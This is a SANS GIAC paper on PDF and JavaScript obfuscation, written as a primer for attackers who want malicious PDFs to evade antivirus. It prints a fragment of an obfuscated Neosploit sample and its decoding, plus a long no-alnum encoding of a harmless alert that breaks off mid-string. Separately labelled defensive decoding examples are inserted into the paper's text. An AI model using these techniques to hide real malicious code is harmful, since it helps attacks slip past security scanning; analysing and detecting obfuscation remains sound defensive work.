
Category: Networking and Security

2012-12-15 10:04:48

SANS Institute
InfoSec Reading Room
This paper is from the SANS Institute Reading Room site. Reposting is not permitted without express written permission.


PDF Obfuscation - A Primer
Obfuscation is widely used to attempt to hide malicious intent. There are a variety of automatic tools
available to both obfuscate and deobfuscate code. What happens when automatic methods fail? What if you wish
to create a malicious PDF for targeted use to subvert antivirus at a hardened client? Understanding
obfuscation fundamentals will help you to both customize attack auto-generated PDFs as well as write custom
PDFs as needed. What follows is an introduction to a variety of obfuscation techniques used by attackers...


Copyright SANS Institute
Author Retains Full Rights
© 2012 The SANS Institute. Key fingerprint = AF19 FA27 2F94 998D FDB5 DE3D F8B5 06E4 A169 4E46. Author retains full rights.
[1.0 June 2012]
PDF Obfuscation – A Primer
GIAC (GPEN) Gold Certification
Author: Chad Robertson, chad@rocacon.com
Advisor: Dennis Distler
Accepted: TBA
Abstract
Obfuscation is widely used to attempt to hide malicious intent.  There are a variety
of automatic tools available to both obfuscate and deobfuscate code.  What happens
when automatic methods fail?  What if you wish to create a malicious PDF for
targeted use to subvert antivirus at a hardened client?  Understanding obfuscation
fundamentals will help you to both customize attack tool auto-generated PDFs as
well as write custom PDFs as needed.  What follows is an introduction to a variety of
obfuscation techniques used by attackers to hide malicious intent and penetrate
corporate networks.
“All warfare is based on deception”
-- Sun Tzu, Art of War
Introduction
PDF, or Portable Data Format, is a widely used business file format that is often 
the target of exploitation.  Symantec recently stated in its intelligence report from 2011 
that “PDF files have become the attack vector of choice for targeted attacks” 
(Symantec).   Trend Micro agrees stating that attackers are “using exploits in popular 
software packages (such as PDF) to send malicious documents”  (Trend Micro).  
Over the years, targeted attacks have become more and more sophisticated as a 
result of various defense technologies becoming better at detection.  Trend Micro 
recently said, “Modified versions of this file type have been especially notorious these 
past few months since they are capable of attacking user systems by initially exploiting 
inherent vulnerabilities found in Adobe Reader and Acrobat” (Trend Micro). As with any 
battlefield, each additional defensive strategy results in the attacker altering his offensive 
stance in a slight way to maintain an advantage over his or her adversary.  Thus, an 
understanding of obfuscation techniques has become necessary to thwart detection.
Because of the widespread use of obfuscation, many automated obfuscation tools 
have been developed to aid attackers.  Many publicly available tools employ only a 
single method of obfuscation and are written as proof of concept.  Tools such as 
Metasploit offer comprehensive obfuscation techniques but are well understood by 
defenders.  Thus, familiarity with obfuscation techniques allows the attacker to customize 
their attack to avoid detection and gain access to the client network.
The same holds true for deobfuscation applications.  While tools, such as 
jsunpack, are designed as a comprehensive deobfuscation platform, many are designed to 
overcome a single obfuscation technique.  Because of this limitation, their use is only 
valuable in certain cases.  Due to the vast array of possible obfuscation techniques 
available, and with new techniques being discovered constantly, these automated 
deobfuscation tools are sometimes unable to successfully return the obfuscated code to 
human-readable code automatically.  A fundamental understanding of obfuscation can 
help us peel back the multiple layers of obfuscation in use by attackers to gain additional 
insight on how we can better hide our own exploitation techniques.   
The usefulness of defensive technologies such as antivirus and intrusion 
detection/prevention systems varies greatly from platform to platform.  Some attempt to 
deobfuscate input completely, but care must be taken to not sacrifice performance in 
these cases.  Also, if the PDF is malformed, or the defense application finds artifacts 
outside of specifications, it may ignore them.  An attacker can leverage these anomalies 
to bypass defenses and gain a foothold on the system. 
This paper is divided into three sections.  The first will explore basic number 
encoding techniques used in obfuscation.  Next we will explore programmatic methods of 
obfuscation.  Finally, we will create a PDF with embedded malicious javascript and 
compare various techniques explored to bypass antivirus. 
Due to the massive amount of information available about various obfuscation 
techniques, this paper should be considered only a primer.  The reader is encouraged to 
use this paper as a starting point on which to base their pursuit of obfuscation prowess. 
1. Numeric Obfuscation Techniques
1.1. BaseX Encoding
BaseX encoding, X being a variable positive integer, is a form of positional notation.
“Positional notation is a method of representing or encoding numbers.”  (Wikipedia). The
base notation that readers are most likely familiar with is base10.  “In mathematical
numeral systems, the base is usually the number of unique digits, including zero, that a
positional numeral system uses to represent numbers”  (Wikipedia).
For example, base10 uses the digits 0 through 9 to represent numbers.  If
counting 0 through 9, the number that follows 9 (9+1) is not a new, unique symbol.
Instead, 9+1 is represented by starting again at zero and shifting that representation
to the left a single digit (10).  Thus, the linear mathematical range between 8 and 9 is
equal to the linear mathematical range between 9 and 10.  This example, of course,
excludes non-linear mathematical scales (logarithmic, etc.).
1.2. Base64 Encoding
“Base64 encoding schemes are commonly used when there is a need to encode
binary data that need to be stored and transferred over media that are designed to
deal with textual data. This is to ensure that the data remain intact without
modification during transport.” (Wikipedia)
The base64 Wikipedia article does an excellent job describing base64
conversion.  We will begin by exploring the example there and then expand upon it
later within this section.
The base64 encoded word “Man” is “TWFu”.  To base64 encode the word “Man”,
we begin by determining the related ASCII 8-bit values for each letter.
M = 77
a = 97
n = 110
Those values can then be represented as 8-bit binary
01001101 = M
01100001 = a
01101110 = n
Since base64 breaks binary into 6 bit groups (6 bits have a maximum of
2^6 = 64 different binary values) (Wikipedia) we need to group our binary a bit
differently. The easiest way to see that is to connect them linearly and then
redistribute into 6-bit groups.
010011010110000101101110
Is thus represented as:
010011
010110
000101
101110
Each of those values is then recalculated in decimal:
010011 = (0 x 2^5) + (1 x 2^4) + (0 x 2^3) + (0 x 2^2) + (1 x 2^1) + (1 x 2^0) = 19
and then compared to the base64 index table in appendix A.
1.2.1. Padding
“Special processing is performed if fewer than 24 bits are available at the end
of the data being encoded.  A full encoding quantum is always completed at the end
of a quantity.  When fewer than 24 input bits are available in an input group, no
additional bits are added (on the right) to form an integral number of 6-bit groups.
Padding at the end of the data is performed using the ‘=’ character”  (Internet
Engineering Task Force).
To see this in action, consider the following example.  Above, we explored
encoding ‘Man’ into base64.  The result was TWFu.  How would we encode the letter
‘M’ only?  The answer, ‘TQ==’, will be explored below.
Let’s begin by reviewing the binary representation of that character.
01001101 = M
If each character is a byte, and we need to separate those bytes into 6-bit
groups, we find the following: 010011 and 01.  010011 equates to 19, or (0 x 2^5) +
(1 x 2^4) + (0 x 2^3) + (0 x 2^2) + (1 x 2^1) + (1 x 2^0).  The remaining bits, 01, are
then padded to complete the minimum 6-bit requirement: 010000.  The result is
16, or (0 x 2^5) + (1 x 2^4) + (0 x 2^3) + (0 x 2^2) + (0 x 2^1) + (0 x 2^0). Looking in
the base64 index we see 16 is mapped to the character ‘Q’.  Each remaining 8
bits required to fulfill the minimum 24 bits is then padded by using the ‘=’ character.
Thus, ‘M’ is encoded to base64 as ‘TQ==’.
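The regrouping and padding steps walked through above, as an added example (not code from the paper). base64Trace is a hypothetical helper name; it returns the intermediate 6-bit groups and table indices so the 'Man' and 'M' cases can be checked one step at a time.

```javascript
// Added example: trace the base64 steps described above (8-bit values ->
// one bit string -> 6-bit groups -> index table -> '=' padding).
// base64Trace is a hypothetical helper name, not part of any library.
const B64_INDEX =
  'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

function base64Trace(text) {
  // Step 1: 8-bit binary for every character, connected linearly.
  const bits = Array.from(text, (ch) => {
    const code = ch.charCodeAt(0);
    if (code > 0xff) throw new RangeError('single-byte characters only');
    return code.toString(2).padStart(8, '0');
  }).join('');

  // Step 2: redistribute into 6-bit groups; a short final group is
  // completed with zero bits on the right (01 -> 010000 for 'M').
  const groups = [];
  for (let i = 0; i < bits.length; i += 6) {
    groups.push(bits.slice(i, i + 6).padEnd(6, '0'));
  }

  // Step 3: each group as a decimal index into the base64 table.
  const indices = groups.map((g) => parseInt(g, 2));
  let encoded = indices.map((i) => B64_INDEX[i]).join('');

  // Step 4: '=' fills the output up to a whole 4-character (24-bit) quantum.
  while (encoded.length % 4 !== 0) encoded += '=';

  return { bits, groups, indices, encoded };
}

console.log(base64Trace('Man'));
console.log(base64Trace('M'));
```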
1.3. ASCII Encoding
“ASCII, or, the American Standard Code for Information Interchange is a
character encoding scheme originally based on the English alphabet” (Wikipedia).
ASCII encoding is a method of representing characters with base2 (binary) strings.
These strings can then be further converted to other formats as needed
(hexadecimal, base64, etc).
(Source: )
In the table above we can see that the columns represent bits 7, 6 and 5
(0000000) and the rows represent bits 4, 3, 2, and 1 (0000000).  Thus, using the
table above we will demonstrate how characters can be encoded below (with a
leading zero added for clarity).
A = 01000001
R = 01010010
^ = 01011110
These binary values can be converted to hexadecimal, octal, or decimal as
shown within appendix B.
1.4. Hexadecimal Encoding
“Hexadecimal is a positional notation system with a base of 16.  It uses sixteen
distinct symbols, most often the symbols 0-9 to represent the values zero to nine,
and A, B, C, D, E, F (or alternatively a-f) to represent values ten to fifteen.  For
example, the number 2AF3 is equal, in decimal, to (2 x 16^3) + (10 x 16^2) + (15 x
16^1) + (3 x 16^0), or 10995.” (Wikipedia).
“Each hexadecimal digit represents four binary digits (bits), and the primary
use of hexadecimal notation is a human-friendly representation of binary-coded
values in computing and digital electronics.” (Wikipedia)
Hexadecimal to binary conversions can be seen in the chart below.
(Source: )
To understand how ASCII, decimal, and hexadecimal work together, consider
the following example.  The character A is assigned the decimal value of 65
(ASCII).  This is represented in binary as 1000001, or, (1 x 2^6) + (0 x 2^5) + (0 x
2^4) + (0 x 2^3) + (0 x 2^2) + (0 x 2^1) + (1 x 2^0).
To find the hexadecimal representation, we need to break that binary string into
four bit groups.  100 0001 should then be considered independently to represent
the hexadecimal values.  Thus, binary 100 represents the first digit and binary 0001
the second in the two digit hexadecimal equivalent.  Looking at the table above (or
calculating it out), binary 100 results in 4, or (1 x 2^2) + (0 x 2^1) + (0 x 2^0) being
in the leftmost position of the resulting hexadecimal representation.  Then, the
remaining binary 0001 is represented in hexadecimal as 1.  The final step is to align
the values linearly thus resulting in hex 41 (sometimes noted as 0x41).
1.5. XOR Operation
“XOR is one type of bitwise operation used to (among other things) obfuscate
data.  A bitwise operation operates on one or more bit patterns or binary numerals
at the level of their individual bits.  A bitwise XOR takes two bit patterns of equal
length and performs a logical exclusive OR operation on each pair of corresponding
bits.  The result in each position is 1 if only the first bit is 1 or only the second bit is
1, but will be 0 if both are 0 or both are 1.” (Wikipedia).
To see an example of this, consider the following:
Given the binary strings 01001001 and 00100110, an XOR operation would result in
01101111.
(Source: Author Created)
Any two string combination can then be used to discover the remaining third string.
(Source: Author Created)
For a practical example of this calculation, consider a RAID-5 (redundant array
of independent disks) array.  RAID-5 requires a minimum of three disks to facilitate
the XOR calculation to achieve the “parity” necessary to recover lost data.  Because
of the nature of the XOR operation, any two of the three streams of bits can be XOR’d
to achieve the third stream.  As a result, within a RAID-5 array, any one disk can be
lost and the array can be rebuilt given the remaining two streams of bits.  With
regards to RAID-5, the result of the XOR operation is distributed across all disks
further supporting the fault tolerance of the disk set.
2. Programmatic Obfuscation Techniques
2.1. Replace Method
“The replace method in javascript returns a copy of a string with text replaced
using a regular expression or search string.” (Microsoft)
(Source: (v=vs.94).aspx)
In the example above, the string “The batter hit the ball with the bat and the
fielder caught the ball with the glove” would be altered by the replace function to
return “a batter hit a ball with a bat and a fielder caught a ball with a glove”.
To apply this feature to the topic of obfuscation, consider how antivirus
might view a PDF.  Antivirus vendors must consider how long it takes to scan a file
and how long a user must wait for a file to be returned.  Scanning for strings only is
much faster than executing embedded javascript and evaluating the resulting
actions.  If a particular antivirus application only looks for static artifacts within the
file it deems indicative of shellcode then it may miss seemingly benign text that will
later be transformed into usable code.
To see this in action, we will take a look at a sample submitted to jsunpack
focusing on the replace methods used.
(Source: )
Above we see several replace methods in use.  A small sample of the string
acted upon is shown below.
annot.push([{subject:'y0dy0ay0dy0ay09y66y75y6ey63y74y69y6fy6ey20y6dy58y58y5f
y36y64y28y59y49y30y5fy5fy37y5fy43y5fy57y5fy36y5fy62y2cy20y55y6ay6fy77y5fy65
y38y37y52y35y73y38y38y29y7by76y61y72y20y43y6cy5fy5fy67y52y47y6ay6fy20y3d
y20y61y72y67y75y6dy65y6ey74y73y2ey63y61y6cy6cy65y65y3by76y61y72y20y79y3
2y48y72y35y32y32y34y5fy5fy4cy20y3dy20y30y3by76y61y72y20y71y5fy66y5fy69y36
y20y3dy20y35y31y32y3b
Putting the pieces together, we can see the variable “s” is made up of the
string subject (sub+ject above).  Then, the replace method is run on the content of
the s variable by s.replace(/[zhyg]/g, '%') replacing all occurrences of y (or zhg for
that matter) with %.  The resulting string is converted from obfuscated text into
hexadecimal encoded text.
%0d%0a%0d%0a%09%66%75%6e%63%74%69%6f%6e%20%6d%58%58%5f%36
%64%28%59%49%30%5f%5f%37%5f%43%5f%57%5f%36%5f%62%2c%20%55%
6a%6f%77%5f%65%38%37%52%35%73%38%38%29%7b%76%61%72%20%43%
6c%5f%5f%67%52%47%6a%6f%20%3d%20%61%72%67%75%6d%65%6e%74%
73%2e%63%61%6c%6c%65%65%3b%76%61%72%20%79%32%48%72%35%32
%32%34%5f%5f%4c%20%3d%20%30%3b%76%61%72%20%71%5f%66%5f%69
%36%20%3d%20%35%31%32%3b
Converting that string to text results in the following (non-string characters
removed):
function mXX_6d(YI0__7_C_W_6_b, Ujow_e87R5s88){var Cl__gRGjo =
arguments.callee;var y2Hr5224__L = 0;var q_f_i6 = 512;
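The same normalisation can be done statically, without running the script, so that a string scanner sees the decoded text. This is an added example, not code from the paper or from jsunpack; it generalises the sample's [zhyg] class by detecting any non-hex stand-in character placed before two hex digits, and the function names and keyword list are assumptions.

```javascript
// Added example (not from the paper or from jsunpack): undo the
// replace()-based layer statically, without executing the script.

// Annotation subject string exactly as printed in the sample above,
// with the page's line wraps removed.
const SUBJECT = [
  'y0dy0ay0dy0ay09y66y75y6ey63y74y69y6fy6ey20y6dy58y58y5f',
  'y36y64y28y59y49y30y5fy5fy37y5fy43y5fy57y5fy36y5fy62y2cy20y55y6ay6fy77y5fy65',
  'y38y37y52y35y73y38y38y29y7by76y61y72y20y43y6cy5fy5fy67y52y47y6ay6fy20y3d',
  'y20y61y72y67y75y6dy65y6ey74y73y2ey63y61y6cy6cy65y65y3by76y61y72y20y79y3',
  '2y48y72y35y32y32y34y5fy5fy4cy20y3dy20y30y3by76y61y72y20y71y5fy66y5fy69y36',
  'y20y3dy20y35y31y32y3b',
].join('');

// Strings a purely static scanner might search for (assumed list).
const KEYWORDS = ['function', 'arguments.callee', 'eval', 'unescape'];

// Decode %XX and %uXXXX the way the legacy unescape() does. Malformed
// sequences are left as they are instead of throwing.
function percentDecode(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (match, u, h) => String.fromCharCode(parseInt(u || h, 16)));
}

// If `s` consists only of <stand-in><hex><hex> units, return the stand-in
// characters seen (['y'] here; the sample's class was [zhyg]); else null.
function findHexDelimiters(s, minUnits = 8) {
  const unit = /([^0-9a-fA-F%\s])[0-9a-fA-F]{2}/y; // sticky: no gaps allowed
  const seen = new Set();
  let units = 0;
  while (unit.lastIndex < s.length) {
    const m = unit.exec(s);
    if (m === null) return null; // something other than a unit: not this scheme
    seen.add(m[1]);
    units += 1;
  }
  return units >= minUnits ? [...seen] : null;
}

// Which of the scanner's keywords appear in the text.
function scan(text) {
  return KEYWORDS.filter((k) => text.includes(k));
}

// Scan the raw string, then again after normalising the stand-in layer.
function analyse(s) {
  const delimiters = findHexDelimiters(s);
  const normalised = delimiters ? s.replace(/[^0-9a-fA-F]/g, '%') : s;
  const decoded = percentDecode(normalised);
  return { delimiters, decoded, rawHits: scan(s), decodedHits: scan(decoded) };
}

console.log(analyse(SUBJECT));
```

The raw string yields no keyword hits; the normalised string yields two, which is the gap between string-only scanning and decoding that the section describes.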
2.2. Array Trickery
Another technique used by malicious javascript authors to alter execution flow
is dependent upon arrays.  Arrays are a very common programming construct used
to contain lists of values.  For our purposes, an array is understood to contain a
series of values labeled n+1 beginning at zero.  Storing values in arrays, and then
returning to a particular value within that array depending on the result of other
variable functions allows for dynamic code execution.
For example, let us take yet another look at one of Neosploit’s PDF obfuscation
techniques.  The malware authors use the getAnnots() call to return an array of
objects containing the document’s annotations.  The function getAnnots() returns
annotations present within the PDF.  Annotations can be thought of as sticky notes
stuck to a particular PDF.  The key to the deobfuscation routine is contained within
the first annotation.  If the PDF is not opened within Adobe Acrobat then the
javascript does not return expected values and the function will return an alternate
annotation.  Therefore, analysis external to Acrobat Reader will be unsuccessful
unless this behavior is considered and accommodations put into place.
2.3. No Alnum
In javascript, numbers can become strings, strings can become numbers, and
arrays can become strings.  “Thus, for example, [] in a string context becomes "". ""
in a number context becomes 0. If we were to do: "" - 1 we'd get the number -1.
Additionally if we were to do [] - 1 we'd get -1. ++ is also able to coerce a string into
a number.” (jeresig)
Using this technique the attacker can create a complex string that will evaluate
to numeric results (or alphanumeric if, for example, referencing characters in a
string) making this technique valuable for obfuscation.
Three simple examples are shown below.
(Source: Author created)
In the first script, the test variable evaluates as 1.  The second, the test
variable evaluates as 2.  Finally, the third test variable evaluates as 3.  To understand
how the first example, ++[[]][+[]] evaluates to 1, read on.
Building upon the previous information, we know that [] evaluates as “”.  “”,
in a number context, becomes 0 if + is present.  Let’s apply those rules in individual
steps to the string above.
(Source: Author created)
The final value results in an array.  The returned result is 1.  Each other string
in the example can be evaluated similarly to achieve similar results.
How could this be used to obfuscate?  A returned numeric value could be
used to refer to offset characters in a seemingly arbitrary string which is then used
to craft additional code at runtime by using, for example, String.fromCharCode(X).
Similarly, one could add necessary characters to an array and then use this
technique to alter execution at runtime.
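The coercion rules quoted above, evaluated step by step by the engine, together with a simple static check for scripts written only with the characters []()!+ . This is an added example, not code from the paper; the function names, the constructed sample and the thresholds are assumptions.

```javascript
// Added example (not from the paper): the coercion rules quoted above,
// evaluated step by step, plus a simple static check for scripts written
// only with the characters []()!+ . Names and thresholds are assumptions.

// Each entry pairs an expression with the value the engine gives it.
function coercionSteps() {
  return [
    ['[] + ""', [] + ''],          // array in a string context -> ""
    ['+""', +''],                  // "" in a number context -> 0
    ['+[]', +[]],                  // so +[] is 0 as well
    ['[[]][+[]]', [[]][+[]]],      // index 0 of [[]] -> the inner []
    ['++[[]][+[]]', ++[[]][+[]]],  // ++ coerces that [] to 0, then adds 1
    ['[] - 1', [] - 1],            // -> -1, as in the quotation
  ];
}

// Constructed sample: index into the string "false" to pick characters.
// (![]+[]) is "false"; [+[]] is [0]; [+!+[]] is [1]  =>  "f" + "a".
const SAMPLE_SRC = '(![]+[])[+[]]+(![]+[])[+!+[]]';
const SAMPLE_VALUE = (![] + [])[+[]] + (![] + [])[+!+[]];

const SYMBOLS = new Set('[]()!+');

// Flag a script body that is long enough to matter, contains no letters or
// digits at all, and is made up almost entirely of the six symbols.
function profileScript(src, minLength = 24) {
  const body = src.replace(/\s+/g, '');
  let symbols = 0;
  let alnum = 0;
  for (const ch of body) {
    if (SYMBOLS.has(ch)) symbols += 1;
    else if (/[0-9A-Za-z]/.test(ch)) alnum += 1;
  }
  const ratio = body.length ? symbols / body.length : 0;
  return {
    length: body.length,
    alnum,
    ratio,
    suspicious: body.length >= minLength && alnum === 0 && ratio >= 0.95,
  };
}

console.log(coercionSteps());
console.log(SAMPLE_VALUE, profileScript(SAMPLE_SRC));
console.log(profileScript('var total = items[0] + (count + 1);'));
```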
The previous techniques are modest in comparison to those available in the
wild.  A much more extreme example, shown below, converts a simple javascript
string into an equivalent alnum string containing 40228 characters total.
“alert("Hello, JavaScript")”
Could be obfuscated as:
+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]]([!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]])+(!+[]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]
+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+
!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!
+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+
!+[]]][(![]+[])[+[]]+(!![]+[])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[
]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[]
)[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!
+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+
[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+
[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!!
[]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+[][(![]+[])[!
+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])
[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]
+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+
[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]]((![]+[])[+!+[]]+(+[![]]+[])[+[]])[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+
[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!
+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[]
[(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+
[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+
[+[]]]+([][[]]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]]([!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]])+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+
[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])
